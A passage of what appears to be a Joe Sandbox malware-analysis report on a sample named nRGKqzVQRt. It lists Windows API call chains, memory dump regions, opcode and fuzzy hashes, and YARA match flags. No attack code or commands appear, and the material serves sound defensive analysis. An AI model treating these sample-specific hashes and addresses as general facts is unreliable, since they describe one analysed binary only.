                                                  • WriteConsoleW.KERNEL32(00000000,00000020,00000000,00000000,00000000,?,004253BF,00000000,00000001,00000000,00000000,?,0042263E,?,00000000,00000000), ref: 00425729
                                                  • GetLastError.KERNEL32(?,004253BF,00000000,00000001,00000000,00000000,?,0042263E,?,00000000,00000000,?,00000000,?,00422B8A,004244B3), ref: 00425735
                                                    • Part of subcall function 004256FB: CloseHandle.KERNEL32(FFFFFFFE,00425745,?,004253BF,00000000,00000001,00000000,00000000,?,0042263E,?,00000000,00000000,?,00000000), ref: 0042570B
                                                  • ___initconout.LIBCMT ref: 00425745
                                                    • Part of subcall function 004256BD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,004256EC,004253AC,00000000,?,0042263E,?,00000000,00000000,?), ref: 004256D0
                                                  • WriteConsoleW.KERNEL32(00000000,00000020,00000000,00000000,?,004253BF,00000000,00000001,00000000,00000000,?,0042263E,?,00000000,00000000,?), ref: 0042575A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                  • String ID:
                                                  • API String ID: 2744216297-0
                                                  • Opcode ID: 53cd3a76a3655e62aab72a6b20d7f3bfc1b13ff990dc26beec92c4dbadd610bd
                                                  • Instruction ID: 5c91372ddcb3b0269811c4be46270c2a59ba6c8506d041d04a9d6cbd44174935
                                                  • Opcode Fuzzy Hash: 53cd3a76a3655e62aab72a6b20d7f3bfc1b13ff990dc26beec92c4dbadd610bd
                                                  • Instruction Fuzzy Hash: 69F03736601528BBCF322F91EC0499E3F26FF443B0F854025FB4D95130CA32C9619B98
                                                  APIs
                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
                                                  • GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45
                                                    • Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B
                                                  • ___initconout.LIBCMT ref: 1000CD55
                                                    • Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0
                                                  • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                  • String ID:
                                                  • API String ID: 2744216297-0
                                                  • Opcode ID: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                  • Instruction ID: e182fa176b596d651ba3484f1012657cf00b5fef4cb1dd311ab1bc31a0a6f155
                                                  • Opcode Fuzzy Hash: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                  • Instruction Fuzzy Hash: 53F030368002A9BBEF125F95CC48EC93FA6FB0D3E0F018025FA0885130DA32C9609B90
                                                  APIs
                                                  • WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,00000000,?,00685626,00000000,00000001,00000000,00000000,?,006828A5,?,00000000,00000000), ref: 00685990
                                                  • GetLastError.KERNEL32(?,00685626,00000000,00000001,00000000,00000000,?,006828A5,?,00000000,00000000,?,00000000,?,00682DF1,?), ref: 0068599C
                                                    • Part of subcall function 00685962: CloseHandle.KERNEL32(00437A50,006859AC,?,00685626,00000000,00000001,00000000,00000000,?,006828A5,?,00000000,00000000,?,00000000), ref: 00685972
                                                  • ___initconout.LIBCMT ref: 006859AC
                                                    • Part of subcall function 00685924: CreateFileW.KERNEL32(00432C28,40000000,00000003,00000000,00000003,00000000,00000000,00685953,00685613,00000000,?,006828A5,?,00000000,00000000,?), ref: 00685937
                                                  • WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,?,00685626,00000000,00000001,00000000,00000000,?,006828A5,?,00000000,00000000,?), ref: 006859C1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                  • String ID:
                                                  • API String ID: 2744216297-0
                                                  • Opcode ID: 53cd3a76a3655e62aab72a6b20d7f3bfc1b13ff990dc26beec92c4dbadd610bd
                                                  • Instruction ID: 56762ad33869ae4f551612670d563d60930a2ec07e37630a1d65ed288cc36681
                                                  • Opcode Fuzzy Hash: 53cd3a76a3655e62aab72a6b20d7f3bfc1b13ff990dc26beec92c4dbadd610bd
                                                  • Instruction Fuzzy Hash: 5FF01C36501658FBCF223F91DC04A9E3F67EB087B0B044124FB1A95120CA328921AB98
                                                  APIs
                                                  • SleepConditionVariableCS.KERNELBASE(?,0040D131,00000064), ref: 0040D1B7
                                                  • LeaveCriticalSection.KERNEL32(004383D4,00438EBC,?,0040D131,00000064,?,?,?,00401047,00438EBC), ref: 0040D1C1
                                                  • WaitForSingleObjectEx.KERNEL32(00438EBC,00000000,?,0040D131,00000064,?,?,?,00401047,00438EBC), ref: 0040D1D2
                                                  • EnterCriticalSection.KERNEL32(004383D4,?,0040D131,00000064,?,?,?,00401047,00438EBC), ref: 0040D1D9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                  • String ID:
                                                  • API String ID: 3269011525-0
                                                  • Opcode ID: fdac45ff0301cbc5be18b6aebdbeb671c9e98f82b4ff16bb29f89a80dabf72b2
                                                  • Instruction ID: 47a6f121230fc22ef05d7342d51693ac5d84e3dbad3790f0b82a870593218e11
                                                  • Opcode Fuzzy Hash: fdac45ff0301cbc5be18b6aebdbeb671c9e98f82b4ff16bb29f89a80dabf72b2
                                                  • Instruction Fuzzy Hash: 67E09B31601724A7C7111B50EC08A9EBE18AF0DF50F01503AFD06663A08F661A1687CC
                                                  APIs
                                                  • _free.LIBCMT ref: 100067F1
                                                    • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                    • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                  • _free.LIBCMT ref: 10006804
                                                  • _free.LIBCMT ref: 10006815
                                                  • _free.LIBCMT ref: 10006826
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                                  • Instruction ID: 2a5a278bef7b5ad6e03033ca92f6b3e0bb2fc7991e1f46602c590ec50041d4ba
                                                  • Opcode Fuzzy Hash: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                                  • Instruction Fuzzy Hash: FBE0E675D10131BAF711EF249C8644E3FA1F799A503068015F528222B7C7369751DFE3
                                                  APIs
                                                  • _free.LIBCMT ref: 00677293
                                                    • Part of subcall function 0067994F: HeapFree.KERNEL32(00000000,00000000,?,006800E2,?,00000000,?,?,?,00680385,?,00000007,?,?,00680878,?), ref: 00679965
                                                    • Part of subcall function 0067994F: GetLastError.KERNEL32(?,?,006800E2,?,00000000,?,?,?,00680385,?,00000007,?,?,00680878,?,?), ref: 00679977
                                                  • _free.LIBCMT ref: 006772A6
                                                  • _free.LIBCMT ref: 006772B7
                                                  • _free.LIBCMT ref: 006772C8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 9f0fc7f5ab5ba42612596697ff71def71168718cc3928d9298bfe44f1fd2fb1c
                                                  • Instruction ID: 44775214cbd6052150787cbd9a5011cc9c7ecc452190254d4d821e983553182b
                                                  • Opcode Fuzzy Hash: 9f0fc7f5ab5ba42612596697ff71def71168718cc3928d9298bfe44f1fd2fb1c
                                                  • Instruction Fuzzy Hash: 79E0ECB1800322AEE6437F19BC0244BFEA2EB44B30305A02FF52816A35DF3D25529F9D
                                                  APIs
                                                  • GetCPInfo.KERNEL32(0000FDE9,?,0000000C,00000000,00000000), ref: 0041EB81
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: Info
                                                  • String ID: $uA
                                                  • API String ID: 1807457897-4017129421
                                                  • Opcode ID: a14bebe26d15cb7d607a1ee63d9f01fe60d0c69c00d09c35d35dffd6adefb78f
                                                  • Instruction ID: 76fe35182010dd4070079eecf5458fb6316312039bb569af5976c5917f7ade40
                                                  • Opcode Fuzzy Hash: a14bebe26d15cb7d607a1ee63d9f01fe60d0c69c00d09c35d35dffd6adefb78f
                                                  • Instruction Fuzzy Hash: EE4150745082489BDB218B19CD84FFB7BFDEB15304F2404AED9CB87142E23CA9C59B99
                                                  APIs
                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0066FDC6
                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0066FE7A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable___except_validate_context_record
                                                  • String ID: csm
                                                  • API String ID: 3480331319-1018135373
                                                  • Opcode ID: 273efe6150e4a2726b12b48060be4535457cf5dcd07bd1ee1b29e53da4973c9f
                                                  • Instruction ID: f6d74b21f7694bdf5a166c1a5b5ca2c3cc9fbadf8d8baf4b03937672bdb48def
                                                  • Opcode Fuzzy Hash: 273efe6150e4a2726b12b48060be4535457cf5dcd07bd1ee1b29e53da4973c9f
                                                  • Instruction Fuzzy Hash: 9A418734A00209EBCF20DF68D884ADDBFB6AF45314F14C169EC199B3A2D7369E15CB95
                                                  APIs
                                                  • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00410421
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID: MOC$RCC
                                                  • API String ID: 2118026453-2084237596
                                                  • Opcode ID: b6581cea79e6053c56ddbaba1da26d4b44f1b87f66912959a96a6225f5ac6c40
                                                  • Instruction ID: e60aaeaf298b3da1b7730a43453d697d135fa25be288e1f3ddcf15ba3106ce2b
                                                  • Opcode Fuzzy Hash: b6581cea79e6053c56ddbaba1da26d4b44f1b87f66912959a96a6225f5ac6c40
                                                  • Instruction Fuzzy Hash: A0417971900209EFCF15DF94C981AEE7BB6FF48304F14806AFA0566252D3799AA0DF54
                                                  APIs
                                                  • EncodePointer.KERNEL32(00000000,?), ref: 100044FB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2604696371.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2604682634.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604717524.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                  • Associated: 00000000.00000002.2604732003.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID: MOC$RCC
                                                  • API String ID: 2118026453-2084237596
                                                  • Opcode ID: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                  • Instruction ID: 0fa13f4c886c2deeb8e1184eea68dc96f9460117e0f406c7378fe553058e7938
                                                  • Opcode Fuzzy Hash: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                  • Instruction Fuzzy Hash: 7B419DB5900109AFEF06CF94CC81AEE7BB5FF48384F168059F9046B25AD736EA50CB55
                                                  APIs
                                                  • RtlEncodePointer.NTDLL(00000000), ref: 00670688
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: EncodePointer
                                                  • String ID: MOC$RCC
                                                  • API String ID: 2118026453-2084237596
                                                  • Opcode ID: b6581cea79e6053c56ddbaba1da26d4b44f1b87f66912959a96a6225f5ac6c40
                                                  • Instruction ID: 025101661f29c4a244a8764d7441dd502ac3ee10ea94981bf137a2a7d12d25fb
                                                  • Opcode Fuzzy Hash: b6581cea79e6053c56ddbaba1da26d4b44f1b87f66912959a96a6225f5ac6c40
                                                  • Instruction Fuzzy Hash: F3414972900209EFDF15DF94C881AEEBBB6FF48304F148159F908A7261D335A960DFA5
                                                  APIs
                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0067C143
                                                  • __freea.LIBCMT ref: 0067C14C
                                                    • Part of subcall function 0067A5FC: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 0067A62E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AllocateHeapStringType__freea
                                                  • String ID: :Vg
                                                  • API String ID: 4073780324-3918182269
                                                  • Opcode ID: b99b28f387eafb06030c840d9611258a78283c5f8ef2eecfdd8ea2824b8dc7c0
                                                  • Instruction ID: 7bc03414a4755a234c6b34ad689dd3fd4893623c68c660dfe074575ebeedcf1f
                                                  • Opcode Fuzzy Hash: b99b28f387eafb06030c840d9611258a78283c5f8ef2eecfdd8ea2824b8dc7c0
                                                  • Instruction Fuzzy Hash: C331907290021AABDB209F64CC41DEF7BB6EF84720F45856CF808A7252D735C951CBA4
                                                  APIs
                                                    • Part of subcall function 0067ECE0: GetOEMCP.KERNEL32(00000000,0067EF51,00000000,00000000,0067933A,0067933A,00000000,004280A0,00000000), ref: 0067ED0B
                                                  • _free.LIBCMT ref: 0067EFAE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: 0uC
                                                  • API String ID: 269201875-1723310363
                                                  • Opcode ID: efdb9210a3a48cac013b61cbf6915b30911a4848a99ba8911043eab9c7e55cc9
                                                  • Instruction ID: aa76a90e8650a5fd14a854dc3b87d487763c85eb3fd40f4fb1d37011332e99ba
                                                  • Opcode Fuzzy Hash: efdb9210a3a48cac013b61cbf6915b30911a4848a99ba8911043eab9c7e55cc9
                                                  • Instruction Fuzzy Hash: BC31E271900209AFDB11DF68C881ADE77F6FF49324F1580AAF8199B2A1EB369D14CF54
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID: hpC
                                                  • API String ID: 269201875-2037328470
                                                  • Opcode ID: 1b100de3c26682a7f9767b5ea4feff90415715e550a8ba004f642e5c751d246c
                                                  • Instruction ID: db70a62786281f505fb3678f1e9e11f12dc2c5b8edfb021eae7c372a6b545b87
                                                  • Opcode Fuzzy Hash: 1b100de3c26682a7f9767b5ea4feff90415715e550a8ba004f642e5c751d246c
                                                  • Instruction Fuzzy Hash: C1112671A003124ADB249B2CAC45B5173E7AB62734F14A63FF528CF6D1FB70D8424B88
                                                  APIs
                                                    • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                    • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                  • __Init_thread_footer.LIBCMT ref: 00401382
                                                    • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                    • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                    • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                  • String ID: AOJ.$AY@B
                                                  • API String ID: 2296764815-514806208
                                                  • Opcode ID: 28e8001ad5e0de1ed841116e899c8068640d3552ed5b59b288d88da72c20cc32
                                                  • Instruction ID: e40916875604ea4a6387975861e2a6da87038d1f1b262f1bab1aa9f1cf823530
                                                  • Opcode Fuzzy Hash: 28e8001ad5e0de1ed841116e899c8068640d3552ed5b59b288d88da72c20cc32
                                                  • Instruction Fuzzy Hash: 6921F6709047448AD7009F79D9457A9F761EF69314F00627EF8442B2E2DF7C26848F4C
                                                  APIs
                                                    • Part of subcall function 0066D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D37E
                                                    • Part of subcall function 0066D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D3BB
                                                  • __Init_thread_footer.LIBCMT ref: 006615E9
                                                    • Part of subcall function 0066D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D333
                                                    • Part of subcall function 0066D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D366
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                  • String ID: AOJ.$AY@B
                                                  • API String ID: 4132704954-514806208
                                                  • Opcode ID: b9e0837025cba329fbcf64bc808262b66bca67f2aea9b36a55b2a3a41771e812
                                                  • Instruction ID: ab22fc92ec8c70cae93084c8bf4525321039fcee6f4c0b4bf91c93a1f4f3f367
                                                  • Opcode Fuzzy Hash: b9e0837025cba329fbcf64bc808262b66bca67f2aea9b36a55b2a3a41771e812
                                                  • Instruction Fuzzy Hash: 8A2105B0E00B449ADB40DF28DE563A8F372EF6A324F04666DF4455B262DF7826848F5C
                                                  APIs
                                                  • __getptd.LIBCMT ref: 0044581C
                                                    • Part of subcall function 00444E8A: __getptd_noexit.LIBCMT ref: 00444E8D
                                                    • Part of subcall function 00444E8A: __amsg_exit.LIBCMT ref: 00444E9A
                                                  • __getptd.LIBCMT ref: 0044582A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603505125.000000000043E000.00000020.00000001.01000000.00000003.sdmp, Offset: 0043E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_43e000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: __getptd$__amsg_exit__getptd_noexit
                                                  • String ID: csm
                                                  • API String ID: 803148776-1018135373
                                                  • Opcode ID: 01a1e967625ed6c6770a7791deda9e1ea86a892e60357f606615257162c40619
                                                  • Instruction ID: b24ed93f697569ef2b6d5a59d689d3c4a5cd8684907444e261ebae58725f1bd4
                                                  • Opcode Fuzzy Hash: 01a1e967625ed6c6770a7791deda9e1ea86a892e60357f606615257162c40619
                                                  • Instruction Fuzzy Hash: F1018F31800E049FEF38AF65C44066EB3B5FF10311F64442FE04196662CF388EA1CB48
                                                  APIs
                                                    • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                    • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                  • __Init_thread_footer.LIBCMT ref: 00408B6E
                                                    • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                    • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                    • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                  • String ID: G@ZK$[@G_
                                                  • API String ID: 2296764815-2338778587
                                                  • Opcode ID: f3c37158fd1a5ba24e5957b92d51df72453808ab86ccf4dff184a90d1cc4fc29
                                                  • Instruction ID: 17a8e3a08237a3d1dc64ba2a9f184f2dca1eb4f57e0bda546bf79f670ee7aec5
                                                  • Opcode Fuzzy Hash: f3c37158fd1a5ba24e5957b92d51df72453808ab86ccf4dff184a90d1cc4fc29
                                                  • Instruction Fuzzy Hash: 9F01D670F10348CBC710DFA89D82A6DF771AB19714F50567EF41577291DF79A8048B49
                                                  APIs
                                                    • Part of subcall function 0040D10C: EnterCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D117
                                                    • Part of subcall function 0040D10C: LeaveCriticalSection.KERNEL32(004383D4,?,?,?,00401047,00438EBC), ref: 0040D154
                                                  • __Init_thread_footer.LIBCMT ref: 004085AE
                                                    • Part of subcall function 0040D0C2: EnterCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0CC
                                                    • Part of subcall function 0040D0C2: LeaveCriticalSection.KERNEL32(004383D4,?,?,00401082,00438EBC,00426B90), ref: 0040D0FF
                                                    • Part of subcall function 0040D0C2: RtlWakeAllConditionVariable.NTDLL ref: 0040D176
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603446200.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2603446200.000000000043A000.00000040.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_nRGKqzVQRt.jbxd
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                  • String ID: G@ZK$[@G_
                                                  • API String ID: 2296764815-2338778587
                                                  • Opcode ID: 74763786bad2c4d3dd100b184df71d5764205cf094470d97c820901261546f57
                                                  • Instruction ID: 7550eea810b6cd8f49eb53c2daec38c4b189c5a8056250b59824f6cde468e405
                                                  • Opcode Fuzzy Hash: 74763786bad2c4d3dd100b184df71d5764205cf094470d97c820901261546f57
                                                  • Instruction Fuzzy Hash: 8F01D670E10344DBC710DFA89D42569F7B1A719310F20167EF525773D1DF39A9058B89
                                                  APIs
                                                    • Part of subcall function 0066D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D37E
                                                    • Part of subcall function 0066D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D3BB
                                                  • __Init_thread_footer.LIBCMT ref: 00668DD5
                                                    • Part of subcall function 0066D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D333
                                                    • Part of subcall function 0066D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D366
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                  • String ID: G@ZK$[@G_
                                                  • API String ID: 4132704954-2338778587
                                                  • Opcode ID: 8999f0e57ceb1786d7004981ee868414a5535114fb6a47991eafc78d05310499
                                                  • Instruction ID: d9b0b4046db20cbc467b3ed493af72117ba7e73185b7959171e760196f49a416
                                                  • Opcode Fuzzy Hash: 8999f0e57ceb1786d7004981ee868414a5535114fb6a47991eafc78d05310499
                                                  • Instruction Fuzzy Hash: AB01D170F10348EBCB00DF68AC82A6DF3B2AB19710F50166DF025A7391DF75A8008F59
                                                  APIs
                                                    • Part of subcall function 0066D373: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D37E
                                                    • Part of subcall function 0066D373: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D3BB
                                                  • __Init_thread_footer.LIBCMT ref: 00668815
                                                    • Part of subcall function 0066D329: RtlEnterCriticalSection.NTDLL(004383D4), ref: 0066D333
                                                    • Part of subcall function 0066D329: RtlLeaveCriticalSection.NTDLL(004383D4), ref: 0066D366
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2603827557.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Offset: 00660000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_660000_nRGKqzVQRt.jbxd
                                                  Yara matches
                                                  Similarity
